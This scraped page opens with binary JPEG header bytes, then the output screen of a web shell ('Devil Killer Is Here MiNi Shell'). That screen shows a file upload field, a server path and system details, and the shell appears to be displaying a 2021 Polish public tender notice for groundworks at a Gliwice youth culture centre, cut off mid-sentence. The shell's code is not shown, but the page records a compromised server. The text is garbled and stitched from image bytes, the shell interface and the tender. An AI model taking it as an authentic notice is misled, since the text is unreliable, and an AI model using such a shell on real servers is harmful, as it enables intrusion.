JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210520/0005986301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00059863 z dnia 2021-05-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacją obiektu-zagospodarowanie terenu z drogami ewakuacyjnymi wokół budynku przy ul. Parkowej 5. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Młodzieżowy Dom Kultury w Gliwicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000724258</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Barlickiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 32/2326954</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 32/2326954</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mdk.gliwice.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mdk.gliwice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacją obiektu-zagospodarowanie terenu z drogami ewakuacyjnymi wokół budynku przy ul. Parkowej 5. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b0a514b1-b8a7-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00059863</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000667/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Zagospodarowanie terenu wokół budynku Młodzieżowego Domu Kultury w Gliwicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.gliwice.eu/zamowienia-publiczne/zamowienie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny<br/>jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących <br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza<br/>do komunikacji”,3) wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych<br/>kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały<br/>w Regulaminie korzystania z miniPortalu https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)<br/>https://www.gov.pl/web/gov/warunki-korzystania,</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych<br/>kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały<br/>w Regulaminie korzystania z miniPortalu https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)<br/>https://www.gov.pl/web/gov/warunki-korzystania,<br/>- maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB,<br/>- za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania<br/>na ePUAP.<br/>- składane przez wykonawców zapytania do specyfikacji powinny być opatrzone zapisem:<br/>"Zapytanie do specyfikacji warunków zamówienia dotyczące zadania pod nazwą:<br/> Modernizacją obiektu-zagospodarowanie terenu z drogami ewakuacyjnymi wokół budynku przy ul.<br/>Parkowej 5."<br/>- zamawiający nie odpowiada za wyjaśnienia udzielane Wykonawcom przez inne osoby i instytucje<br/>nieuprawnione do bezpośredniego kontaktowania się z wykonawcami, niż wymienione w niniejszej SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia<br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Młodzieżowy Dom Kultury w Gliwicach, ul. Norberta<br/>Barlickiego 3, 44-100 Gliwice .<br/>2. Kontakt z Inspektorem ochrony danych osobowych możliwy jest pod adresem e-mail:<br/>SOKOLOWSKA_A@MDK.GLIWICE.PL.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego prowadzonego pod nazwą: "Modernizacją<br/>obiektu-zagospodarowanie terenu z drogami ewakuacyjnymi wokół budynku przy ul. Parkowej 5.", numer<br/>sprawy: MDK.S.262.1.2021, prowadzonym w trybie: tryb podstawowy- wariant I (bez negocjacji) w oparciu<br/>o art. 275-296 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz.U. z 2019, poz. 2019<br/>z poźn. zm.) zwanej dalej "ustawą pzp".<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 3 i 4 ustawy Pzp. <br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy przekracza<br/>4 lata, okres przechowywania obejmuje cały okres obowiązywania umowy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. <br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*;<br/>− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9. Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.* Wyjaśnienie: w przypadku skorzystania przez osobę, której dane osobowe są przetwarzane przez<br/>zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO, zamawiający może żądać od osoby<br/>występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MDK.S.262.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane związane z modernizacją obiektu- wykonanie<br/>zagospodarowania terenu -przebudowa i remont istniejących ciągów komunikacyjnych - etap 2B. Planowany<br/>do wykonania etap 2B jest powiązany z wykonanym w 2020 roku etapem 2A. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zakres robót analogicznie do robót przewidzianym w zamówieniu podstawowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">nazwa waga (znaczenie)% sposób liczenia wg wzoru<br/>cena Wa=60,00 Ca=((Cmin/Cof)xWa)x100 pkt<br/>okres gwarancji i rękojmi Wb=40,00 GiR=((GiRof/60)x Wb)x100 pkt<br/>gdzie:<br/>Kryterium "cena":<br/>Cmin - najniższa cena<br/>Cof - cena badanej oferty<br/>Ca - liczba punktów w kryterium (cena)<br/>Wa - waga w ocenianym kryterium (cena)<br/>Kryterium "gwarancja i rękojmia":<br/>GiR - liczba punktów w kryterium (gwarancja i rękojmia)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolnosc do wystepowania w obrocie gospodarczym<br/>Okreslenie warunku:<br/>Zamawiajacy nie okresla szczegółowego warunku w tym zakresie.<br/>2. Uprawnienia do prowadzenia okreslonej działalnosci gospodarczej lub zawodowej, o ile wynika to z<br/>odrebnych przepisów<br/>Okreslenie warunku:<br/>Zamawiajacy nie okresla szczegółowego warunku w tym zakresie.<br/>3. Sytuacja finansowa lub ekonomiczna<br/>Okreslenie warunku:<br/>Zamawiajacy nie okresla szczegółowego warunku w tym zakresie.<br/>4. Zdolnosc techniczna lub zawodowa<br/>Okreslenie warunku:<br/>O zamówienie moga ubiegac sie wykonawcy, którzy w okresie ostatnich pieciu lat przed upływem terminu<br/>składania ofert, a jezeli okres prowadzenia działalnosci jest krótszy - w tym okresie, wykonali nalezycie,<br/>w szczególnosci zgodnie z przepisami prawa budowlanego i prawidłowo ukonczyli<br/>a) jedna robote budowlana polegajaca na: budowie lub przebudowie lub remoncie nawierzchni utwardzonych<br/>o wartosci ukonczonych robót nie mniejsza niz 140 000,00 zł. brutto<br/>Zdolnosc techniczna dla podmiotów wystepujacych wspólnie bedzie oceniana łacznie dla wszystkich<br/>podmiotów.<br/>O zamówienie moga ubiegac sie wykonawcy, którzy dysponuja lub beda dysponowac osobami zdolnymi<br/>do wykonania zamówienia, to znaczy:<br/>a) co najmniej 1 osoba posiadajaca uprawnienia budowlane do kierowania robotami w specjalnosci<br/>konstrukcyjno-budowlanej<br/>b) co najmniej 1 osoba posiadajaca uprawnienia budowlane do kierowania robotami budowlanymi<br/>w specjalnosci instalacyjnej w zakresie instalacji sanitarnych<br/>Wskazane powyzej uprawnienia budowlane musza byc zgodne z ustawa z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t.j. Dz. U. z 2020 r. poz. 13333 z pózn. zm.) oraz Rozporzadzeniem Ministra Inwestycji i Rozwoju<br/>z 29 kwietnia 2019 r. (Dz.U. z 2019 r. poz. 831) w sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie lub odpowiadajacymi im waznymi uprawnieniami<br/>budowlanymi, wydanymi na podstawie uprzednio obowiazujacych przepisów prawa lub odpowiednimi<br/>przepisami obowiazujacymi na terenie kraju, z którego pochodzi dana osoba, które w zakresie objetym<br/>zamówieniem pozwalac beda na pełnienie samodzielnych funkcji technicznych w budownictwie w ww.<br/>specjalnosciach.<br/>Zdolnosc zawodowa dla podmiotów wystepujacych wspólnie bedzie oceniana łacznie dla wszystkich<br/>podmiotów.<br/>5. W odniesieniu do warunków dotyczacych wykształcenia, kwalifikacji zawodowych lub doswiadczenia,<br/>wykonawcy wspólnie ubiegajacy sie o udzielenie zamówienia moga polegac na zdolnosciach tych<br/>z wykonawców, którzy wykonaja roboty budowlane lub usługi, do realizacji których te zdolnosci sa wymagane.<br/>W takim przypadku wykonawcy wspólnie ubiegajacy sie o udzielenie zamówienia dołaczaja odpowiednio<br/>do wniosku o dopuszczenie do udziału w postepowaniu albo do oferty oswiadczenie, z którego wynika, które<br/>roboty budowlane lub usługi wykonaja poszczególni wykonawcy.<br/>6. W przypadku podania kwot w walucie obcej, zamawiajacy dokona przeliczenia tej wartosci na wartosc<br/>w złotych według sredniego kursu NBP dla danej waluty z dnia zamieszczenia ogłoszenia w Biuletynie<br/>Zamówien Publicznych. Jezeli w dniu ukazania sie ogłoszenia o zamówieniu, NBP nie opublikuje informacji<br/>o srednim kursie walut, Zamawiajacy dokona odpowiednich przeliczen wg sredniego kursu z pierwszego,<br/>kolejnego dnia, w którym NBP opublikuje ww. informacje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- odpis lub informacja z Krajowego Rejestru Sadowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzona nie wcześniej niż<br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast powyższego dokumentu składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, ze nie otwarto jego likwidacji, nie<br/>ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sad, nie zawarł układu z wierzycielami,<br/>jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury,<br/>wystawione nie wcześniej niż 3 miesiące przed ich złożeniem,<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa powyżej w niniejszym punkcie, lub gdy dokumenty te nie odnoszą się<br/>do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b<br/>oraz pkt 3 ustawy pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym<br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą lub, jeżeli<br/>w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przed organem sadowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. Dokumenty te powinny być wystawione w terminach nie wcześniejszych niż<br/>podano powyżej,<br/>- oświadczenie wykonawcy, w zakresie art. 108 ust 1 pkt 5 ustawy pzp, o braku przynależności<br/>do tej samej grupy kapitałowej o treści ZAŁĄCZNIKA NR 15 do SWZ w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawca, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>·<br/>oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa<br/>w art. 125 ust. 1 ustawy pzp o treści ZAŁĄCZNIKA NR 3 do SWZ<br/>Zamawiający zada od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub<br/>sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych<br/>w art. 118 ustawy, przedstawienia podmiotowych środków dowodowych, wymienionych w niniejszym<br/>punkcie, dotyczących tych podmiotów - za wyjątkiem oświadczenia, w zakresie art. 108 ust 1 pkt 5<br/>ustawy pzp, o braku przynależności do tej samej grupy kapitałowej,<br/>·<br/>Zamawiający zada od wykonawcy przedstawienia dokumentów wymienionych w niniejszym punkcie<br/>dotyczących podwykonawców, którym zamierza powierzyć wykonanie części zamówienia, a którzy nie są<br/>podmiotami, na których zdolnościach lub sytuacji wykonawca polega na zasadach określonych w art. 118<br/>ustawy - za wyjątkiem oświadczenia, w 